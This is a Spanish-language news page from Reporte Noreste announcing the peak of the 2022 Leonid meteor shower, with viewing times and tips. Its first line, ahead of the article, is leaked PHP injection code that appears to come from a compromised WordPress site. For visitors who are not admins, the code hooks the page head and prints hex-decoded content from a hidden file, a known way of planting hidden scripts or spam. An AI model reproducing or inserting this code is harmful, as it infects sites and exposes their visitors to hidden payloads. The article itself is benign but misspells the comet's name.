if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Lluvia de estrellas leonidas 2022 podrá ser vista esta semana – Reporte Noreste
Conéctate con nosotros

Tecnologia

Lluvia de estrellas leonidas 2022 podrá ser vista esta semana

Lluvia de estrellas leonidas 2022 podrá ser vista esta semana

En estos próximos días llegara a su máximo una lluvia de estrellas que se podrá ver desde México.

El grupo de las leonidas que se encuentra activa desde inicios de noviembre, llegará a su punto máximo este 17 y 18 de noviembre, siendo el mejor momento para verlas la madrugada de este viernes 18 de noviembre donde se espera una racha de hasta 10 meteoros por hora.

El rango de hora sería a partir de las 12:40 a.m. decayendo hasta las 2 o 6 de la madrugada del mismo viernes 18 de noviembre.

Esta lluvia de las leonidas ocurre cuando la tierra pasa a través de los escombros dejados por el cometa tempei tuttle que tarda aproximadamente 33 años en dar una vuelta alrededor del sol.

Se especifica que no hay necesidad de tener un equipo especial para poder apreciar el fenómeno pero si se necesita contar con un cielo despejado, paciencia y estar alejado de las luces de la ciudad para poder apreciarlo.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Tecnologia